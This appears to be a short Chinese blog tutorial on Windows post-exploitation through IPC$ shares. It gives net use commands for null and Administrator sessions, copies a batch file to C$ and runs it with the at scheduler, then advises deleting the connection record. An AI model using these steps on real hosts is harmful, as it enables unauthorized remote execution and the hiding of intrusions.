【后滲透】利用IPC進(jìn)行滲透

IPC

什么是IPC?
IPC(Internet Process Connect),直譯過(guò)來(lái)就是網(wǎng)絡(luò)進(jìn)程連接,一般用來(lái)進(jìn)行資源共享的。
我們經(jīng)常會(huì)說(shuō)IPC空連接,就是連接的時(shí)候不用賬戶和密碼,但是一般這種情況是沒(méi)啥權(quán)限的,如果我們能有一個(gè)管理員的賬戶,那么就可以有管理員的權(quán)限來(lái)進(jìn)行滲透了。

IPC入侵思路

因?yàn)闈B透的時(shí)候是需要靈活的技巧,因此這里只是記錄一個(gè)滲透思路罷了。

IPC空連接

net use \\ip\ipc$ "" /user:""

以某用戶賬戶登陸

net use \\ip\ipc$ "password" /user:Administrator

之后,我們可以寫一個(gè)批處理文件,里面包含這我們想執(zhí)行的命令,然后copy到服務(wù)器上

copy 1.bat \\ip\c$

這樣,就會(huì)把它上傳到c盤

之后我們可以利用windows的定時(shí)任務(wù)來(lái)執(zhí)行這個(gè)文件
首先我們看一下服務(wù)器上的時(shí)間

net time \\ip

之后利用at命令來(lái)設(shè)置定時(shí)任務(wù)

at \\ip 時(shí)間 文件名

滲透完畢后記得刪掉記錄

net use \\ip\ipc$ /del
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Android 自定義View的各種姿勢(shì)1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 178,667評(píng)論 25 709
  • 關(guān)于Mongodb的全面總結(jié) MongoDB的內(nèi)部構(gòu)造《MongoDB The Definitive Guide》...
    中v中閱讀 32,273評(píng)論 2 89
  • 你說(shuō)你只是缺少個(gè)玩伴才和我在一起的,我不想每天都活在你的陰影下,我也不想每天都十分等待你的消息,與其煎熬,不如結(jié)...
    奈何沉淪閱讀 157評(píng)論 0 0
  • 守夜人 夜里的靈魂一直在飄飄蕩蕩 等不到安穩(wěn)的一生 隨時(shí)靠著沉浮歇息 我們是守夜的兩個(gè)...
    陳汐年閱讀 827評(píng)論 8 32
  • 看過(guò)《修女也瘋狂》,平常一本正經(jīng)的修女們瘋起來(lái)真的不要命!吃貨呢?平時(shí)本來(lái)就夠瘋的,再瘋起來(lái),那可真是沒(méi)命了! 能...
    元初閱讀 261評(píng)論 0 0

友情鏈接更多精彩內(nèi)容